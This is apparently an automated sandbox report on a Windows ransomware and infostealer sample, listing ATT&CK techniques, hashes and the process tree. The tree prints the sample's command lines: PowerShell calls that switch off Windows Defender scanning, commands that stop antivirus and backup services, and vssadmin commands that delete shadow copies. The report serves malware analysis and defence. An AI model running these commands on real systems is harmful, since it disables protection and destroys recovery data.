81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e

Analysis

max time kernel
138s
max time network
131s
platform
windows10_x64
resource
win10v20210410
submitted
26-07-2021 12:58

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe
Size

416KB
MD5

21fa6ebdd397f14bbb68a4e3d012467e
SHA1

0ecff2f818565e7eb28d3a7b7d295459a868e920
SHA256

81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e
SHA512

368e0c8e973f2cf655ea8a69be07b29bc073b2855f6feb9130f5fa8569cfa8d094549ec5d7706c293f8b22ae8bb6ee1b7dd2f4c2d2ccff94e7435e36d966bf66

Score

10^/10

evasion ransomware spyware stealer trojan

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490
Disables Task Manager via registry modification
evasion

Modifies extensions of user files 1 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

Processes:

81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe

description	ioc	process
File created	C:\Users\Admin\Pictures\UpdateComplete.png.builder	81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Enumerates connected drives 3 TTPs 18 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

vssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exe

description	ioc	process
File opened (read-only)	\??\e:	vssadmin.exe
File opened (read-only)	\??\F:	vssadmin.exe
File opened (read-only)	\??\G:	vssadmin.exe
File opened (read-only)	\??\g:	vssadmin.exe
File opened (read-only)	\??\D:	vssadmin.exe
File opened (read-only)	\??\D:	vssadmin.exe
File opened (read-only)	\??\E:	vssadmin.exe
File opened (read-only)	\??\F:	vssadmin.exe
File opened (read-only)	\??\G:	vssadmin.exe
File opened (read-only)	\??\h:	vssadmin.exe
File opened (read-only)	\??\E:	vssadmin.exe
File opened (read-only)	\??\e:	vssadmin.exe
File opened (read-only)	\??\f:	vssadmin.exe
File opened (read-only)	\??\f:	vssadmin.exe
File opened (read-only)	\??\g:	vssadmin.exe
File opened (read-only)	\??\H:	vssadmin.exe
File opened (read-only)	\??\h:	vssadmin.exe
File opened (read-only)	\??\H:	vssadmin.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Interacts with shadow copies 2 TTPs 14 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

Processes:

vssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exe

pid	process
4928	vssadmin.exe
4524	vssadmin.exe
3820	vssadmin.exe
4884	vssadmin.exe
3980	vssadmin.exe
2212	vssadmin.exe
4576	vssadmin.exe
2948	vssadmin.exe
3264	vssadmin.exe
4428	vssadmin.exe
3664	vssadmin.exe
2832	vssadmin.exe
4852	vssadmin.exe
3096	vssadmin.exe

Kills process with taskkill 3 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exe

pid process

4128 taskkill.exe
4648 taskkill.exe
4764 taskkill.exe
Runs net.exe

pid	process
4128	taskkill.exe
4648	taskkill.exe
4764	taskkill.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
1432	powershell.exe
1432	powershell.exe
1432	powershell.exe
3080	powershell.exe
3732	powershell.exe
1908	powershell.exe
3080	powershell.exe
3876	powershell.exe
3876	powershell.exe
1928	powershell.exe
1928	powershell.exe
192	powershell.exe
192	powershell.exe
2688	powershell.exe
2688	powershell.exe
3732	powershell.exe
3732	powershell.exe
3080	powershell.exe
3080	powershell.exe
2264	81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe
2264	81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe
2264	81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe
2264	81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe
2264	81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe
2264	81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe
2264	81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe
2264	81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe
2264	81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe
2264	81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe
2264	81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe
2264	81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe
2264	81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe
2264	81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe
4164	powershell.exe
4164	powershell.exe
2788	powershell.exe
2788	powershell.exe
4280	powershell.exe
4280	powershell.exe
4424	powershell.exe
4424	powershell.exe
1908	powershell.exe
1908	powershell.exe
3876	powershell.exe
3876	powershell.exe
3732	powershell.exe
4548	powershell.exe
4548	powershell.exe
1928	powershell.exe
1928	powershell.exe
192	powershell.exe
192	powershell.exe
2788	powershell.exe
2688	powershell.exe
1908	powershell.exe
4164	powershell.exe
3876	powershell.exe
4280	powershell.exe
4424	powershell.exe
1928	powershell.exe
4548	powershell.exe
192	powershell.exe
2788	powershell.exe
2688	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

description	pid	process
Token: SeDebugPrivilege	1432	powershell.exe
Token: SeIncreaseQuotaPrivilege	1432	powershell.exe
Token: SeSecurityPrivilege	1432	powershell.exe
Token: SeTakeOwnershipPrivilege	1432	powershell.exe
Token: SeLoadDriverPrivilege	1432	powershell.exe
Token: SeSystemProfilePrivilege	1432	powershell.exe
Token: SeSystemtimePrivilege	1432	powershell.exe
Token: SeProfSingleProcessPrivilege	1432	powershell.exe
Token: SeIncBasePriorityPrivilege	1432	powershell.exe
Token: SeCreatePagefilePrivilege	1432	powershell.exe
Token: SeBackupPrivilege	1432	powershell.exe
Token: SeRestorePrivilege	1432	powershell.exe
Token: SeShutdownPrivilege	1432	powershell.exe
Token: SeDebugPrivilege	1432	powershell.exe
Token: SeSystemEnvironmentPrivilege	1432	powershell.exe
Token: SeRemoteShutdownPrivilege	1432	powershell.exe
Token: SeUndockPrivilege	1432	powershell.exe
Token: SeManageVolumePrivilege	1432	powershell.exe
Token: 33	1432	powershell.exe
Token: 34	1432	powershell.exe
Token: 35	1432	powershell.exe
Token: 36	1432	powershell.exe
Token: SeDebugPrivilege	3732	powershell.exe
Token: SeDebugPrivilege	3080	powershell.exe
Token: SeDebugPrivilege	1908	powershell.exe
Token: SeDebugPrivilege	3876	powershell.exe
Token: SeDebugPrivilege	1928	powershell.exe
Token: SeDebugPrivilege	192	powershell.exe
Token: SeDebugPrivilege	2688	powershell.exe
Token: SeDebugPrivilege	2264	81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe
Token: SeDebugPrivilege	2788	powershell.exe
Token: SeDebugPrivilege	4164	powershell.exe
Token: SeDebugPrivilege	4280	powershell.exe
Token: SeDebugPrivilege	4424	powershell.exe
Token: SeDebugPrivilege	4548	powershell.exe
Token: SeIncreaseQuotaPrivilege	3080	powershell.exe
Token: SeSecurityPrivilege	3080	powershell.exe
Token: SeTakeOwnershipPrivilege	3080	powershell.exe
Token: SeLoadDriverPrivilege	3080	powershell.exe
Token: SeSystemProfilePrivilege	3080	powershell.exe
Token: SeSystemtimePrivilege	3080	powershell.exe
Token: SeProfSingleProcessPrivilege	3080	powershell.exe
Token: SeIncBasePriorityPrivilege	3080	powershell.exe
Token: SeCreatePagefilePrivilege	3080	powershell.exe
Token: SeBackupPrivilege	3080	powershell.exe
Token: SeRestorePrivilege	3080	powershell.exe
Token: SeShutdownPrivilege	3080	powershell.exe
Token: SeDebugPrivilege	3080	powershell.exe
Token: SeSystemEnvironmentPrivilege	3080	powershell.exe
Token: SeRemoteShutdownPrivilege	3080	powershell.exe
Token: SeUndockPrivilege	3080	powershell.exe
Token: SeManageVolumePrivilege	3080	powershell.exe
Token: 33	3080	powershell.exe
Token: 34	3080	powershell.exe
Token: 35	3080	powershell.exe
Token: 36	3080	powershell.exe
Token: SeDebugPrivilege	4128	taskkill.exe
Token: SeIncreaseQuotaPrivilege	3732	powershell.exe
Token: SeSecurityPrivilege	3732	powershell.exe
Token: SeTakeOwnershipPrivilege	3732	powershell.exe
Token: SeLoadDriverPrivilege	3732	powershell.exe
Token: SeSystemProfilePrivilege	3732	powershell.exe
Token: SeSystemtimePrivilege	3732	powershell.exe
Token: SeProfSingleProcessPrivilege	3732	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exenet.exenet.exenet.exenet.exenet.exe

description	pid	process	target process
PID 2264 wrote to memory of 1432	2264	81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe	powershell.exe
PID 2264 wrote to memory of 1432	2264	81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe	powershell.exe
PID 2264 wrote to memory of 3732	2264	81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe	powershell.exe
PID 2264 wrote to memory of 3732	2264	81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe	powershell.exe
PID 2264 wrote to memory of 3080	2264	81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe	powershell.exe
PID 2264 wrote to memory of 3080	2264	81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe	powershell.exe
PID 2264 wrote to memory of 1908	2264	81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe	powershell.exe
PID 2264 wrote to memory of 1908	2264	81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe	powershell.exe
PID 2264 wrote to memory of 3876	2264	81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe	powershell.exe
PID 2264 wrote to memory of 3876	2264	81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe	powershell.exe
PID 2264 wrote to memory of 1928	2264	81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe	powershell.exe
PID 2264 wrote to memory of 1928	2264	81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe	powershell.exe
PID 2264 wrote to memory of 192	2264	81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe	powershell.exe
PID 2264 wrote to memory of 192	2264	81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe	powershell.exe
PID 2264 wrote to memory of 2688	2264	81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe	powershell.exe
PID 2264 wrote to memory of 2688	2264	81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe	powershell.exe
PID 2264 wrote to memory of 2788	2264	81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe	powershell.exe
PID 2264 wrote to memory of 2788	2264	81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe	powershell.exe
PID 2264 wrote to memory of 4164	2264	81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe	powershell.exe
PID 2264 wrote to memory of 4164	2264	81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe	powershell.exe
PID 2264 wrote to memory of 4280	2264	81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe	powershell.exe
PID 2264 wrote to memory of 4280	2264	81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe	powershell.exe
PID 2264 wrote to memory of 4424	2264	81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe	powershell.exe
PID 2264 wrote to memory of 4424	2264	81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe	powershell.exe
PID 2264 wrote to memory of 4548	2264	81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe	powershell.exe
PID 2264 wrote to memory of 4548	2264	81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe	powershell.exe
PID 2264 wrote to memory of 4680	2264	81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe	net.exe
PID 2264 wrote to memory of 4680	2264	81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe	net.exe
PID 4680 wrote to memory of 4972	4680	net.exe	net1.exe
PID 4680 wrote to memory of 4972	4680	net.exe	net1.exe
PID 2264 wrote to memory of 4956	2264	81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe	net.exe
PID 2264 wrote to memory of 4956	2264	81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe	net.exe
PID 4956 wrote to memory of 4608	4956	net.exe	wmiprvse.exe
PID 4956 wrote to memory of 4608	4956	net.exe	wmiprvse.exe
PID 2264 wrote to memory of 4744	2264	81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe	net.exe
PID 2264 wrote to memory of 4744	2264	81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe	net.exe
PID 4744 wrote to memory of 4696	4744	net.exe	Conhost.exe
PID 4744 wrote to memory of 4696	4744	net.exe	Conhost.exe
PID 2264 wrote to memory of 4184	2264	81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe	net.exe
PID 2264 wrote to memory of 4184	2264	81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe	net.exe
PID 4184 wrote to memory of 1608	4184	net.exe	net1.exe
PID 4184 wrote to memory of 1608	4184	net.exe	net1.exe
PID 2264 wrote to memory of 4392	2264	81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe	net.exe
PID 2264 wrote to memory of 4392	2264	81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe	net.exe
PID 4392 wrote to memory of 3336	4392	net.exe	net1.exe
PID 4392 wrote to memory of 3336	4392	net.exe	net1.exe
PID 2264 wrote to memory of 692	2264	81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe	sc.exe
PID 2264 wrote to memory of 692	2264	81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe	sc.exe
PID 2264 wrote to memory of 2960	2264	81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe	sc.exe
PID 2264 wrote to memory of 2960	2264	81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe	sc.exe
PID 2264 wrote to memory of 3332	2264	81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe	sc.exe
PID 2264 wrote to memory of 3332	2264	81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe	sc.exe
PID 2264 wrote to memory of 3920	2264	81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe	sc.exe
PID 2264 wrote to memory of 3920	2264	81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe	sc.exe
PID 2264 wrote to memory of 4128	2264	81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe	taskkill.exe
PID 2264 wrote to memory of 4128	2264	81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe	taskkill.exe
PID 2264 wrote to memory of 4648	2264	81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe	taskkill.exe
PID 2264 wrote to memory of 4648	2264	81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe	taskkill.exe
PID 2264 wrote to memory of 4764	2264	81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe	taskkill.exe
PID 2264 wrote to memory of 4764	2264	81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe	taskkill.exe
PID 2264 wrote to memory of 3820	2264	81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe	vssadmin.exe
PID 2264 wrote to memory of 3820	2264	81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe	vssadmin.exe
PID 2264 wrote to memory of 4576	2264	81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe	vssadmin.exe
PID 2264 wrote to memory of 4576	2264	81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe	vssadmin.exe

C:\Users\Admin\AppData\Local\Temp\81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe
"C:\Users\Admin\AppData\Local\Temp\81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe"
1⤵
- Modifies extensions of user files
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2264

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" Get-MpPreference -verbose
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1432

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3732

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3080

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1908

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3876

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1928

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:192

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2688

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2788

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4164

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4280

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4424

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4548

C:\Windows\SYSTEM32\net.exe
"net.exe" stop avpsus /y
2⤵
- Suspicious use of WriteProcessMemory
PID:4680

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop avpsus /y
3⤵
PID:4972

C:\Windows\SYSTEM32\net.exe
"net.exe" stop McAfeeDLPAgentService /y
2⤵
- Suspicious use of WriteProcessMemory
PID:4956

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop McAfeeDLPAgentService /y
3⤵
PID:4608

C:\Windows\SYSTEM32\net.exe
"net.exe" stop mfewc /y
2⤵
- Suspicious use of WriteProcessMemory
PID:4744

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop mfewc /y
3⤵
PID:4696

C:\Windows\SYSTEM32\net.exe
"net.exe" stop BMR Boot Service /y
2⤵
- Suspicious use of WriteProcessMemory
PID:4184

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BMR Boot Service /y
3⤵
PID:1608

C:\Windows\SYSTEM32\net.exe
"net.exe" stop NetBackup BMR MTFTP Service /y
2⤵
- Suspicious use of WriteProcessMemory
PID:4392

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y
3⤵
PID:3336

C:\Windows\SYSTEM32\sc.exe
"sc.exe" config SQLTELEMETRY start= disabled
2⤵
PID:692

C:\Windows\SYSTEM32\sc.exe
"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
2⤵
PID:2960

C:\Windows\SYSTEM32\sc.exe
"sc.exe" config SQLWriter start= disabled
2⤵
PID:3332

C:\Windows\SYSTEM32\sc.exe
"sc.exe" config SstpSvc start= disabled
2⤵
PID:3920

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM mspub.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4128

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM mydesktopqos.exe /F
2⤵
- Kills process with taskkill
PID:4648

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM mydesktopservice.exe /F
2⤵
- Kills process with taskkill
PID:4764

C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" Delete Shadows /all /quiet
2⤵
- Interacts with shadow copies
PID:3820

C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=401MB
2⤵
- Interacts with shadow copies
PID:4576

C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=unbounded
2⤵
- Interacts with shadow copies
PID:4884

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:4696

C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=401MB
2⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:3664

C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=unbounded
2⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:4928

C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=401MB
2⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:3980

C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=unbounded
2⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2832

C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=401MB
2⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:4852

C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=unbounded
2⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2948

C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=401MB
2⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2212

C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=unbounded
2⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:4524

C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=401MB
2⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:3096

C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=unbounded
2⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:3264

C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" Delete Shadows /all /quiet
2⤵
- Interacts with shadow copies
PID:4428

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
PID:4608

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:5116

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Disabling Security Tools

T1089

File Deletion

T1107

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
MD5
8592ba100a78835a6b94d5949e13dfc1

SHA1
63e901200ab9a57c7dd4c078d7f75dcd3b357020

SHA256
fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c

SHA512
87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
896350c50a90dce546309f947e1f7ef0

SHA1
0af7cbfd7c1efba7172b62600be7641a0f7c1442

SHA256
8e01b2a465f402ea478749eba5537bd0fbc6617208a340b1fc56d11b38e5f63d

SHA512
1f36e35c0f5af7bbff19721558e3f6cbd23b70271d687221a5704a5c812712afdd5a62ee6db13cd2a4a51ca560ed30f5096ca0d2e69feb618ba170bcd1c9f585

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
